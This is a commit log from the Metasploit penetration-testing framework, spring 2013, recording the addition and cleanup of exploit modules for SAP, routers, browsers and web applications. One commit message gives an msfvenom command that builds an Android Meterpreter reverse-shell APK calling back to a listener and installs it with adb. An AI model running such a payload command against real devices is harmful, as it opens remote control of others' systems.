jvazquez-r7
ad21a107ec
up to date
2013-05-06 15:48:59 -05:00
jvazquez-r7
fcb9dc1384
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-06 15:40:22 -05:00
jvazquez-r7
c84febb81a
Fix extra character
2013-05-06 15:19:15 -05:00
jvazquez-r7
92b4d23c09
Add Mariano as Author because of the abuse disclosure
2013-05-06 15:15:15 -05:00
jvazquez-r7
db243e78c8
Land #1682 , sap_router_info_request fix from @nmonkee
2013-05-06 15:13:57 -05:00
jvazquez-r7
85581a0b6f
Clean up sap_soap_rfc_eps_get_directory_listing
2013-05-06 13:21:42 -05:00
jvazquez-r7
1fc0bfa165
Change module filename
2013-05-06 13:20:07 -05:00
m-1-k-3
09bf23f4d6
linksys wrt160n tftp download module
2013-05-06 16:18:15 +02:00
m-1-k-3
22d850533a
dir615 down and exec exploit
2013-05-06 15:33:45 +02:00
m-1-k-3
0f2a3fc2d4
dsl320b authentication bypass - password extract
2013-05-06 14:31:47 +02:00
jvazquez-r7
7b960a4f18
Add OSVDB reference
2013-05-06 00:54:00 -05:00
jvazquez-r7
a17062405d
Clean up for sap_soap_rfc_eps_delete_file
2013-05-06 00:53:07 -05:00
jvazquez-r7
5adc2879bf
Change module filename
2013-05-06 00:51:23 -05:00
jvazquez-r7
66a5eb74c5
Move file to auxiliary/dos/sap
2013-05-06 00:50:50 -05:00
jvazquez-r7
425a16c511
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-05 22:00:07 -05:00
David Maloney
e40695769d
unbotch merge?
2013-05-05 16:43:56 -05:00
David Maloney
2d99167fe7
Merge commit 'b0f5255de8f78fb0d54be1ee49f43455968d6740' into upstream-master
2013-05-05 16:41:18 -05:00
David Maloney
b0f5255de8
fix ssh_creds username
...
ssh_creds post module as not saving
the username in the cred objects
2013-05-05 16:31:28 -05:00
Tod Beardsley
8239998ada
Typo on URL for #1797 . Thx @Meatballs1
2013-05-05 12:26:06 -05:00
Tod Beardsley
c9ea7e250e
Fix disclosure date, ref for #1897
2013-05-05 12:13:02 -05:00
Tod Beardsley
e9841b216c
Land #1797 , IE8 DoL exploit module from @wchen-r7
...
Exploit for an in-the-wild unpatched vuln in IE8. @jvazquez-r7 already
reviewed functionality
2013-05-05 12:06:45 -05:00
sinn3r
a33510e821
Add MS IE8 DoL 0day exploit (CVE-2013-1347)
...
This module exploits a use-after-free vuln in IE 8, used in the
Department of Labor attack.
2013-05-05 12:04:17 -05:00
HD Moore
63b0eace32
Add a missing require
2013-05-04 22:39:57 -05:00
jvazquez-r7
2384f34ada
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-03 15:39:16 -05:00
m-1-k-3
c3e9503c0b
tplink traversal - initial commit
2013-05-03 14:27:13 -05:00
jvazquez-r7
589be270bf
Land #1658 , @nmonkee's SAP module for PFL_CHECK_OS_FILE_EXISTENCE
2013-05-03 14:19:36 -05:00
jvazquez-r7
13202a3273
Add OSVDB reference
2013-05-03 09:46:29 -05:00
jvazquez-r7
a95de101e7
Delete extra line
2013-05-02 22:04:27 -05:00
jvazquez-r7
6210b42912
Port EDB 25141 to msf
2013-05-02 22:00:43 -05:00
jvazquez-r7
796f7a39ac
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-02 20:04:48 -05:00
jvazquez-r7
a2e1fbe7a9
Make msftidy happy
2013-05-02 19:46:26 -05:00
jvazquez-r7
f57b2de632
Land #1787 , @wchen-r7's mod to ie_cbutton_uaf to use the js_mstime_malloc API
2013-05-02 19:44:19 -05:00
jvazquez-r7
9e1037bce0
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-02 16:15:28 -05:00
jvazquez-r7
b096449a97
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-02 15:12:19 -05:00
Tod Beardsley
7579b574cb
Rework parse_xml
...
We try to avoid using Nokogiri in modules due to the sometimes
uncomfortable dependencies it creates with particular compiled libxml
versions. Also, the previous parse_xml doesn't seem to be correctly
skipping item entries with blank names.
I will paste the test XML in the PR proper, but do check against a live
target to make sure I'm not screwing it up.
2013-05-02 14:43:30 -05:00
Tod Beardsley
902cd7ec85
Revert removal of the SAP module
...
This reverts commit 26da7a6ee7
.
2013-05-02 14:42:35 -05:00
sinn3r
eb23b5feeb
Forgot to remove function ie8_smil. Don't need this anymore.
2013-05-02 14:04:15 -05:00
sinn3r
329e8228d1
Uses js_mstime_malloc to do the no-spray technique
2013-05-02 14:00:15 -05:00
Tod Beardsley
26da7a6ee7
Removing this from master due to test problems
...
This module was moved over to the unstable branch in commit
7106afdf7d
, working up a fix now. Stay
tuned.
2013-05-02 13:43:02 -05:00
jvazquez-r7
132c09af82
Add BID reference
2013-05-02 10:21:09 -05:00
jvazquez-r7
6e68f3cf34
Clean up sap_soap_rfc_pfl_check_os_file_existence
2013-05-02 10:19:15 -05:00
jvazquez-r7
244bf71d4a
Change module filename
2013-05-02 10:15:50 -05:00
jvazquez-r7
29d4e378aa
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-02 09:27:51 -05:00
jvazquez-r7
d9cdb6a138
Fix more feedback provided by @nmonkee: CMD vs COMMAND
2013-05-02 09:08:48 -05:00
jvazquez-r7
c6c7998e3b
Fix feedback provided by @nmonkee
2013-05-02 09:06:51 -05:00
jvazquez-r7
4db81923bf
Update description
2013-05-02 08:45:01 -05:00
jvazquez-r7
4054d91955
Land #1657 , @nmonkee's RZL_READ_DIR_LOCAL SAP dir listing module
2013-05-02 08:38:50 -05:00
jvazquez-r7
e25057b64a
Fix indent level
2013-05-01 22:01:36 -05:00
jvazquez-r7
c406271921
Cleanup sap_soap_rfc_rzl_read_dir
2013-05-01 21:51:06 -05:00
jvazquez-r7
98dd96c57d
Change module filename
2013-05-01 21:50:24 -05:00
jvazquez-r7
6b6b53240b
Fix SAP modules, mainly to make a better use of send_request_cgi
2013-05-01 14:06:53 -05:00
jvazquez-r7
ec34544299
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-01 11:47:36 -05:00
Michael Schierl
a13cf53b9f
Android Meterpreter bugfixes
...
- classes.dex gets mangled on windows; use binary mode when reading it
- UnknownHostExceptions on API Level 3 emulator because of trailing
whitespace after the hostname/IP
- Work around integer overflow at year 2038 when signing the payload
2013-05-01 18:01:37 +02:00
jvazquez-r7
567d2bb14b
Land #1687 , @bmerinofe's forensic file recovery post module
2013-05-01 08:13:08 -05:00
jvazquez-r7
a201391ee6
Clean recovery_files
2013-04-30 13:18:32 -05:00
Gregory Man
76e70adcff
Added Memcached Remote Denial of Service module
...
https://code.google.com/p/memcached/issues/detail?id=192
2013-04-30 17:45:09 +03:00
jvazquez-r7
a7e4ba5015
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-30 08:32:24 -05:00
Tod Beardsley
60e0cfb17b
Trivial description cleanup
2013-04-29 14:11:20 -05:00
Tod Beardsley
4227c23133
Add a reference for Safari module
2013-04-29 14:07:55 -05:00
Joe Vennix
431cba8f36
Update print_status labels.
2013-04-29 11:13:53 -05:00
Joe Vennix
c2a1d296a2
Rename DOWNLOAD_URI -> DOWNLOAD_PATH.
...
Conflicts:
modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
2013-04-29 11:11:06 -05:00
Joe Vennix
55e0ec3187
Add support for DOWNLOAD_URI option.
...
* Fixes some comments that were no longer accurate.
Conflicts:
modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
2013-04-29 11:10:19 -05:00
jvazquez-r7
a4632b773a
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-28 12:59:16 -05:00
sinn3r
1d9a695d2b
Landing #1772 - Adds phpMyadmin Preg_Replace module (CVE-2013-3238)
...
[Closes #1772 ]
2013-04-28 12:17:16 -05:00
Meatballs
ccb630eca2
Whitespace and change default user
2013-04-27 10:39:27 +01:00
Meatballs
209188bc22
Add refs and use targeturi
2013-04-27 10:35:49 +01:00
Meatballs
3ac041386b
Add php version to check
2013-04-26 23:59:49 +01:00
Meatballs
e25fdebd8d
Add php version to check
2013-04-26 23:58:08 +01:00
Meatballs
cd842df3e2
Correct phpMyAdmin
2013-04-26 23:38:27 +01:00
Meatballs
6bb2af7cee
Add pma url
2013-04-26 23:37:26 +01:00
sinn3r
6821c360b6
Landing #1761 - Adds Wordpress Total Cache module
...
[Closes #1761 ]
2013-04-26 16:08:04 -05:00
sinn3r
6c76bee02f
Trying to make the description sound smoother
2013-04-26 16:02:28 -05:00
James Lee
9c8b93f1b7
Make sure LPORT is a string when subbing
...
* Gets rid of conversion errors like this:
[-] Exploit failed: can't convert Fixnum into String
* also removes comments from php meterp. Works for me with the
phpmyadmin_preg_replace bug, so seems legit.
2013-04-26 15:26:31 -05:00
James Lee
a0c1b6d1ce
Clear out PMA's error handler
...
* Add an error_handler function that just returns true. This prevents eventual
ENOMEM errors and segfaults like these:
[Fri Apr 26 15:01:00 2013] [error] [client 127.0.0.1] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 44659282 bytes) in /home/egypt/repo/phpmyadmin/libraries/Error.class.php on line 156
[Fri Apr 26 15:01:16 2013] [notice] child pid 7347 exit signal Segmentation fault (11)
* clean up some whitespace
2013-04-26 15:25:09 -05:00
Meatballs
1f2cab7aef
Tidyup and getcookies
2013-04-26 20:26:04 +01:00
Meatballs
0901d00da5
Remove redundant pay opts
2013-04-26 19:26:29 +01:00
Meatballs
a17d61897d
Change to send_rq_cgi
2013-04-26 19:19:11 +01:00
Tod Beardsley
bf6b1b4fbf
Land #1773 , fixes for Safari UXSS
...
Makes the module more user-friendly, doesn't barf on malformed paths for
keystroke logger catching.
2013-04-26 13:11:55 -05:00
Tod Beardsley
c27245e092
Touch descriptions for module and options
2013-04-26 13:05:16 -05:00
Joe Vennix
b4606ba60a
Remove unnecessary puts call.
2013-04-26 12:55:02 -05:00
Tod Beardsley
ca6d6fbc84
msftidy for whitespace
2013-04-26 12:44:11 -05:00
Tod Beardsley
16769a9260
Fixing path normalization
2013-04-26 12:40:24 -05:00
Meatballs
54233e9fba
Better entropy
2013-04-26 17:46:43 +01:00
Meatballs
c8da13cfa0
Add some entropy in request
2013-04-26 17:34:17 +01:00
Joe Vennix
2fa16f4d36
Rewrite relative script URLs to be absolute.
...
* Adds rescue clauses around URI parsing/pulling
* Actually use the URI_PATH datastore option.
2013-04-26 11:25:20 -05:00
Meatballs
a043d3b456
Fix auth check and cookie handling
2013-04-26 17:10:24 +01:00
Meatballs
025315e4e4
Move to http
2013-04-26 15:42:26 +01:00
Meatballs
9ad19ed2bf
Final tidyup
2013-04-26 15:41:28 +01:00
jvazquez-r7
99b46202b9
Do final cleanup for sap_configservlet_exec_noauth
2013-04-26 08:45:34 -05:00
jvazquez-r7
308b880d79
Land #1759 , @andrewkabai's exploit for SAP Portal Command Execution
2013-04-26 08:44:11 -05:00
Meatballs
c7ac647e4e
Initial attempt lfi
2013-04-26 14:32:18 +01:00
Andras Kabai
5839e7bb16
simplify code
2013-04-26 12:14:42 +02:00
Andras Kabai
4aadd9363d
improve description
2013-04-26 12:13:45 +02:00
jvazquez-r7
2a41422276
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-25 20:24:17 -05:00
sinn3r
f3f60f3e02
Fixes P/P/R for target 0 (BadBlue 2.72b)
...
Target 1, which covers 2.72b, uses an invalid P/P/R from some unknown
DLL, and appears to be broken. Because 2.72b actually uses the same
ext.dll as BadBlue EE 2.7 (and that target 0 actually also works
against 2.72b), we might as well just use the same P/P/R again.
[FixRM #7875 ]
2013-04-25 20:20:24 -05:00
jvazquez-r7
bf0375f0e9
Fix @jlee-r7's feedback
2013-04-25 18:43:21 -05:00
jvazquez-r7
8eea476cb8
Build the jnlp uri when resource is available
2013-04-25 18:43:21 -05:00
jvazquez-r7
cc961977a2
Add bypass for click2play
2013-04-25 18:43:21 -05:00
jvazquez-r7
9b5e96b66f
Fix @jlee-r7's feedback
2013-04-25 14:53:09 -05:00
jvazquez-r7
52b721c334
Update description
2013-04-25 14:47:35 -05:00
jvazquez-r7
84e9f80ffa
Add check for WP-Super-Cache
2013-04-25 14:43:16 -05:00
James Lee
6767eee08a
Add in-line signing
...
Signing the generated APK in the module means users don't have to have
keytool or jarsigner to create a working package.
Example usage:
./msfvenom -p android/meterpreter/reverse_tcp \
LHOST=192.168.99.1 LPORT=2222 -f raw > meterp.apk
adb install ./meterp.apk
2013-04-25 13:57:54 -05:00
Andras Kabai
9dd9b2d1ba
implement cleanup functionality
...
register DELETE_FILES advanced option to take control of the cleanup
functionality of CmdStagerVBS and FileDropper, implement the necessary
changes
2013-04-25 20:02:24 +02:00
jvazquez-r7
15c8d92148
Fix version checked and add reference
2013-04-25 12:48:36 -05:00
Andras Kabai
a28ef1847b
update references
2013-04-25 18:26:13 +02:00
Joe Vennix
993356c73e
Add safari webarchive uxss to framework as an aux module.
2013-04-25 11:14:16 -05:00
jvazquez-r7
7bf4aa317f
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-25 10:31:51 -05:00
jvazquez-r7
b67fcd3219
Add OSVDB ref to sap_configservlet_exec_noauth
2013-04-25 08:13:32 -05:00
jvazquez-r7
7d317e5933
Switch from post to get on check
2013-04-25 07:51:28 -05:00
jvazquez-r7
d55faa14d3
Add check function
2013-04-25 07:44:37 -05:00
Andras Kabai
676f2f5f4a
implement "check" functionality
2013-04-25 07:47:30 +02:00
Andras Kabai
3b46d5d4cd
fix typos
2013-04-25 07:22:16 +02:00
Andras Kabai
2759ef073e
correction on error handling
2013-04-25 07:19:27 +02:00
Andras Kabai
6b14ac5e71
add rank to module
2013-04-25 07:07:35 +02:00
jvazquez-r7
51fd07a145
Add BID reference
2013-04-24 21:48:05 -05:00
jvazquez-r7
378c2079a2
Add hdm also as author
2013-04-24 17:37:29 -05:00
jvazquez-r7
b816dd569c
Update description
2013-04-24 17:34:25 -05:00
jvazquez-r7
573e880a62
Use the correct post id when posting
2013-04-24 17:30:24 -05:00
jvazquez-r7
ded0269ba0
Add POST ID bruteforcing capabality
2013-04-24 17:21:36 -05:00
jvazquez-r7
fca4c3b8b2
Add sha1 sum check to allow execution
2013-04-24 16:10:49 -05:00
jvazquez-r7
d2e29b846c
Add module for Wordpress Total Cache PHP Injection
2013-04-24 15:29:40 -05:00
Andras Kabai
f22d19a10c
remove unused code block
...
ARCH_CMD was implemented in previous version of this code.
2013-04-24 21:51:35 +02:00
jvazquez-r7
38e41f20fe
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-24 13:24:13 -05:00
Andras Kabai
0339be229a
implement dynamic timeout handling
2013-04-24 18:22:37 +02:00
Andras Kabai
6f8fc81497
improve error handling
2013-04-24 17:59:11 +02:00
jvazquez-r7
2b4144f20f
Add module for US-CERT-VU 345260
2013-04-24 10:47:16 -05:00
Andras Kabai
57113bee80
fine correction
...
add license
remove one unnecessary tab to make msftidy happy
2013-04-24 15:07:32 +02:00
Andras Kabai
6485124cdf
fix module name
2013-04-24 10:54:52 +02:00
Andras Kabai
358b8934bf
clarify description
2013-04-24 10:31:40 +02:00
Andras Kabai
00e6eeca54
implement command line magick to prevent bad char usage
...
commas in the HTTP queries are not allowed but the VBS stager contains
some, therefore it was necessary to find a way to echo out commas
without directly use them.
thanks to Laszlo Toth to help me figure out this windows command line
trick.
2013-04-24 09:46:36 +02:00
Andras Kabai
783cca6c17
allow only ARCH_X86 payloads
2013-04-24 09:29:47 +02:00
sinn3r
cae30bec23
Clean up all the whitespace found
2013-04-23 18:27:11 -05:00
jvazquez-r7
1761b1ad7b
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-23 17:35:35 -05:00
jvazquez-r7
ece36c0610
Update references for the las Java exploit
2013-04-22 21:55:04 -05:00
jvazquez-r7
96b66d3856
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-22 21:49:59 -05:00
jvazquez-r7
1529dff3f3
Do final cleanup for sap_configservlet_exec_noauth
2013-04-22 21:43:41 -05:00
jvazquez-r7
8c9715c2ed
Land #1751 , @andrewkabai's SAP Portal remote OS command exec
2013-04-22 21:41:53 -05:00
jvazquez-r7
5f5e772f7c
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-22 21:31:16 -05:00
sinn3r
a09b3b8023
Lands #1169 - Adds a check
...
[Closes #1169 ]
Conflicts:
modules/auxiliary/dos/http/apache_range_dos.rb
2013-04-22 15:50:15 -05:00
sinn3r
882b084cba
Changes the default action
2013-04-22 15:47:38 -05:00
sinn3r
7e28a4ddb0
Uses "ACTIONS" keys instead of datastore options
...
It's better to use ACTIONS instead of datastore in this case. Also,
did some cleanup.
2013-04-22 15:41:47 -05:00
sinn3r
dfff20a3fc
Landing #1692 - Handles OSQL banners and responses
...
[Close #1692 ]
2013-04-22 13:58:44 -05:00
Andras Kabai
79eb2ff62d
add EDB ID to references
2013-04-22 18:37:28 +02:00
Andras Kabai
15b06c43aa
sap_configservlet_exec_noauth auxiliary module
...
the final module was moved from my master branch to here because of the
pull request needs
2013-04-22 17:40:27 +02:00
Andras Kabai
b4f1f3efbb
remove aux module from master branch
2013-04-22 17:34:01 +02:00
Andras Kabai
750638e4d6
note on bad characters
2013-04-22 17:24:08 +02:00
jvazquez-r7
b6365db0b5
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-22 09:38:32 -05:00
Andras Kabai
a1e52b5b27
command execution needs cmd /c
2013-04-22 10:20:45 +02:00
Antoine
0115833724
SyntaxError fixes
2013-04-21 20:22:41 +00:00
Andras Kabai
d26289e05a
proper output handling in case of CMD payloads
2013-04-20 17:38:58 +02:00
Andras Kabai
d59ba37e6d
resize linemax
2013-04-20 17:37:50 +02:00
Andras Kabai
e36b58169b
implement CmbStagerVBS payload execution
2013-04-20 16:37:47 +02:00
Andras Kabai
8244c4dcac
multiple payload types, different paths to execute payloads
2013-04-20 14:20:30 +02:00
Andras Kabai
7b6a784a84
basic payload execution through OS command execution
2013-04-20 13:02:22 +02:00
Andras Kabai
223556a4e6
switch to exploit module environment
...
switch to Msf::Exploit, change the necessary declarations, start to
change the exploitation process
2013-04-20 12:30:44 +02:00
Andras Kabai
cff47771a2
initial commit
...
the original aux module will be the base of the exploit module
2013-04-20 11:32:05 +02:00
jvazquez-r7
1365dfe68c
Add Oracle url
2013-04-20 01:43:14 -05:00
jvazquez-r7
b99fc06b6f
description updated
2013-04-20 01:43:14 -05:00
jvazquez-r7
19f2e72dbb
Added module for Java 7u17 sandboxy bypass
2013-04-20 01:43:13 -05:00
jvazquez-r7
d1c5179b83
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-19 17:48:12 -05:00
Andras Kabai
49b055e5fd
make msftidy happy
2013-04-20 00:26:04 +02:00
Andras Kabai
e4d9c45ce9
remove unnecessary rank rating
2013-04-20 00:23:55 +02:00
jvazquez-r7
c7fcd6931a
Use vprint_error
2013-04-19 16:22:07 -05:00
jvazquez-r7
4ef33197dc
Land #1745 - @FireFart's improvement for MediaWiki aux module
2013-04-19 16:20:33 -05:00
jvazquez-r7
ffb71ff61b
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-19 16:03:55 -05:00
jvazquez-r7
19a158dce9
Do final cleanup for netgear_dgn2200b_pppoe_exec
2013-04-19 15:50:23 -05:00
jvazquez-r7
c1819e6ecc
Land #1700 , @m-1-k-3's exploit for Netgear DGN2200B
2013-04-19 15:49:30 -05:00
Christian Mehlmauer
eaff87879e
added text
2013-04-19 22:03:05 +02:00
Christian Mehlmauer
a6be72b019
fixes for mediawiki aux module
2013-04-19 21:43:12 +02:00
Andras Kabai
763d1ac2f1
remove unnecessary option declaration
2013-04-19 21:42:28 +02:00
Andras Kabai
85932a2445
improve URI path and parameter handling
...
switch from PATH to TARGETURI datastore;
use normalize_uri to build uri;
use query in send_request_cgi to to prepare query string (instead of
vars_get that escapes the necessary semicolons)
2013-04-19 21:37:39 +02:00
jvazquez-r7
d4fa2ba96d
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-19 14:14:36 -05:00
Andras Kabai
c52588f579
remove Scanner mixin
...
remove Scanner mixin because this module is not a scanner modul
2013-04-19 20:28:44 +02:00
sinn3r
7fdf84ac45
Landing #1744 - Checks nil before using resp.headers['Server']
...
[Closes #1744 ]
2013-04-19 10:37:05 -05:00
jvazquez-r7
31586770a0
Added module for OSVDB 92490
2013-04-18 14:34:02 -05:00
Andras Kabai
8f76c436d6
SAP ConfigServlet OS Command Execution module
...
This module allows execution of operating system commands throug the
SAP ConfigServlet without any authentication.
2013-04-18 20:26:48 +02:00
RageLtMan
15c6df1482
Check for nil before calling on value
2013-04-18 00:32:37 -04:00
m-1-k-3
2713991c64
timeout and HTTP_Delay
2013-04-17 20:25:59 +02:00
jvazquez-r7
bbf7cc4394
up to date
2013-04-17 11:54:12 -05:00
m-1-k-3
59045f97fb
more testing, reworking of config restore, rework of execution
2013-04-17 18:10:27 +02:00
jvazquez-r7
48def7dbdb
up to date
2013-04-17 06:36:44 -05:00
jvazquez-r7
088eb8618d
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-16 21:11:55 -05:00
Jon Hart
83ec9757ec
Addressed feedback from PR#1717
2013-04-16 19:00:26 -07:00
jvazquez-r7
4e8d32a89a
cleanup for freefloatftp_user
2013-04-16 20:43:38 -05:00
jvazquez-r7
eedeb37047
Landing #1731 , @dougsko's freefloat ftp server bof exploit
2013-04-16 20:42:01 -05:00
jvazquez-r7
cc35591723
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-15 17:43:15 -05:00
root
830715dc07
Applying changes
2013-04-16 00:28:39 +02:00
Tod Beardsley
a36c6d2434
Lands #1730 , adds a VERBOSE option checker
...
Also removes VERBOSE options from extant modules. There were only 5 of
them, and one was a commented option.
2013-04-15 15:32:56 -05:00
Tod Beardsley
29101bad41
Removing VERBOSE offenders
2013-04-15 15:29:56 -05:00
Tod Beardsley
be39079830
Trailing whitespace fix
...
Note that this commit needed a --no-verify because of the erroneous
check in msftidy for writing to stdout. The particular syntax of this
payload makes it look like we're doing that when we're really not.
So don't sweat it.
2013-04-15 13:58:06 -05:00
Tod Beardsley
efdf4e3983
Lands #1485 , fixes for Windows-based Ruby targets
2013-04-15 13:56:41 -05:00
Tod Beardsley
873bdbab57
Removing APSB13-03, not ready.
...
This was landed by @todb-r7 on #1709 but that was premature. #1717 was
a proposed set of fixes, but it didn't go far enough.
@jhart-r7 and @jvazquez-r7 should revisit this module for sure, there's
some good stuff in there, but it's not ready for a real release quite
yet. Take a look at the issues discussed in those PRs and open a new PR
with a new module?
Sorry for the switcheroo, not trying to be a jerk.
[Closes #1717 ]
2013-04-15 13:36:47 -05:00
Tod Beardsley
513b3b1455
Minor cleanup on DLink module
2013-04-15 13:27:47 -05:00
timwr
df9c5f4a80
remove unused resources and fix whitespace
2013-04-13 16:22:52 +01:00
timwr
32bd812bdb
android meterpreter
2013-04-12 18:57:04 +01:00
jvazquez-r7
9c0862ad7b
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-11 21:53:07 +02:00
jvazquez-r7
7e5d4bc893
Landing #1614 , @jwpari nagios nrpe exploit
2013-04-11 17:53:52 +02:00
James Lee
e3eef76372
Land #1223
...
This adds rc4-encrypting stagers for Windows.
[Closes #1223 ]
2013-04-10 12:14:52 -05:00
James Lee
6c980981db
Break up long lines and add magic encoding comment
2013-04-10 09:28:45 -05:00
jvazquez-r7
4959e03864
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-10 11:29:37 +02:00
jvazquez-r7
a1605184ed
Landing #1719 , @m-1-k-3 dlink_diagnostic_exec_noauth exploit module
2013-04-10 11:17:29 +02:00
jvazquez-r7
4f2e3f0339
final cleanup for dlink_diagnostic_exec_noauth
2013-04-10 11:15:32 +02:00
m-1-k-3
8fbade4cbd
OSVDB
2013-04-10 10:45:30 +02:00
jvazquez-r7
1d4096cc19
Merge branch 'dlink_dir645_command_exec_noauth' of https://github.com/m-1-k-3/metasploit-framework into m-1-k-3-dlink_dir645_command_exec_noauth
2013-04-10 09:15:06 +02:00
jvazquez-r7
2ab7552a85
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-10 09:11:41 +02:00
Tod Beardsley
0d2746fb4c
defs should have parens when taking args
...
While it's allowed in ruby to drop most parens, many are useful for
readability.
Also adds a missing CVE.
2013-04-09 17:57:52 -05:00
Tod Beardsley
90e986860e
Adding most suggested changes to jhart's adobe module
2013-04-09 17:55:28 -05:00
Tod Beardsley
2d09aa2a91
Landing #1709 .
2013-04-09 10:55:21 -05:00
jvazquez-r7
ba7603e66c
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-09 17:34:23 +02:00
sinn3r
76d4538d2a
Merge branch 'master' of github.com:rapid7/metasploit-framework
2013-04-09 10:24:54 -05:00
sinn3r
1e258170dc
It's a filename, so not trying to match any single char
2013-04-09 10:20:52 -05:00
sinn3r
50cf039170
Merge branch 'cve-2013-1899-not-auth' of github.com:jhart-r7/metasploit-framework into jhart-r7-cve-2013-1899-not-auth
2013-04-09 10:19:15 -05:00
jvazquez-r7
79620ed660
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-09 17:12:16 +02:00
Tod Beardsley
65e5ed8950
Merge #1716 , version checker fix for UAC bypass
2013-04-09 09:00:30 -05:00
Tod Beardsley
ba86e14d43
Whitespace and caps fixes
2013-04-09 08:57:53 -05:00
jvazquez-r7
0cef2f6453
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-09 12:51:15 +02:00
jvazquez-r7
157f25788b
final cleanup for linksys_wrt54gl_apply_exec
2013-04-09 12:39:57 +02:00
jvazquez-r7
b090495ffb
Landing pr #1703 , m-1-k-3's linksys_wrt54gl_apply_exec exploit
2013-04-09 12:38:49 +02:00
m-1-k-3
b93ba58d79
EDB, BID
2013-04-09 11:56:53 +02:00
HD Moore
e2b8d5ed23
Fix from David Kennedy, enable Windows 8 support
2013-04-09 02:07:40 -05:00
James Lee
a2d6f7bb17
Landing #1714 - Don't bomb out if there are no wireless interfaces
...
No redmine ticket reported.
2013-04-08 17:17:47 -05:00
root
f369584bbd
Timeout added
2013-04-08 23:32:07 +02:00
m-1-k-3
cbefc44a45
correct waiting
2013-04-08 21:40:50 +02:00
jvazquez-r7
ef63a4f5cf
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-08 21:29:01 +02:00
jvazquez-r7
225342ce8f
final cleanup for sysax_sshd_kexchange
2013-04-08 20:28:37 +02:00
jvazquez-r7
5bc454035c
Merge remote-tracking branch 'origin/pr/1710' into landing-pr1710
2013-04-08 20:20:11 +02:00
Melih SARICA
e48cea432c
added add_sub encoder for x86 payloads
2013-04-08 20:51:39 +03:00
Jon Hart
b1152d1567
Improve Postgres CVE-2013-1899 to detect unauthorized connections
2013-04-08 09:55:23 -07:00
jvazquez-r7
d65bf8bab9
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-08 18:19:41 +02:00
sinn3r
d24371eaff
Merge branch 'hp_imc_reportimgservlt_traversal' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-hp_imc_reportimgservlt_traversal
2013-04-08 10:18:30 -05:00
sinn3r
1b5c34db1a
Merge branch 'hp_imc_ictdownloadservlet_traversal' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-hp_imc_ictdownloadservlet_traversal
2013-04-08 10:17:19 -05:00
sinn3r
11253c8f3e
Merge branch 'hp_imc_faultdownloadservlet_traversal' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-hp_imc_faultdownloadservlet_traversal
2013-04-08 10:16:52 -05:00
Matt Andreko
f96baa7e7e
Code Review Feedback
...
made the CLIENTVERSION always include the "SSH-2.0-OpenSSH_5.1p1 " to trigger DoS
2013-04-08 10:58:35 -04:00
Matt Andreko
4c8e19ad1a
Added reference
...
Removed final debug print statement
2013-04-08 08:28:53 -04:00
Jon Hart
8a98b1af4a
Added command mode, plus fixed the dropping of payloads
2013-04-07 15:39:38 -07:00
m-1-k-3
955efc7009
final cleanup
2013-04-07 17:59:57 +02:00
m-1-k-3
9f89a996b2
final regex, dhcp check and feedback from juan
2013-04-07 17:57:18 +02:00
jvazquez-r7
0e69edc89e
fixing use of regex
2013-04-07 11:39:29 +02:00
Jon Hart
f482496795
Initial commit of an exploit module for the CVEs covered by APSB13-03.
...
Not complete but will currently get command execution on Coldfusion 9.x
instances with CSRF protection disabled
2013-04-06 20:08:50 -07:00
jvazquez-r7
6a410d984d
adding get_config where I forgot
2013-04-06 19:13:42 +02:00
jvazquez-r7
0c25ffb4de
Landing #1695 , agix's smhstart local root exploit
2013-04-06 17:32:12 +02:00
jvazquez-r7
55302ee07f
Merge remote-tracking branch 'origin/pr/1695' into landing-pr1695
2013-04-06 17:30:02 +02:00
jvazquez-r7
2533d0b714
up to date
2013-04-06 17:25:12 +02:00
jvazquez-r7
6f1fb4a873
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-06 17:23:24 +02:00
jvazquez-r7
9a2f409974
first cleanup for linksys_wrt54gl_apply_exec
2013-04-06 01:05:09 +02:00
m-1-k-3
ecaaaa34bf
dlink diagnostic - initial commit
2013-04-05 19:56:15 +02:00
jvazquez-r7
dccf0751a3
up to date
2013-04-05 11:41:10 +02:00
jvazquez-r7
2367c90e74
Merge branch 'hp_system_management_root' of https://github.com/agix/metasploit-framework
2013-04-05 11:18:18 +02:00
jvazquez-r7
daba48035d
fix DEPTH description and basename
2013-04-05 11:05:46 +02:00
jvazquez-r7
b6edad1f1d
fix DEPTH description and basename
2013-04-05 11:04:43 +02:00
jvazquez-r7
d163e96d6a
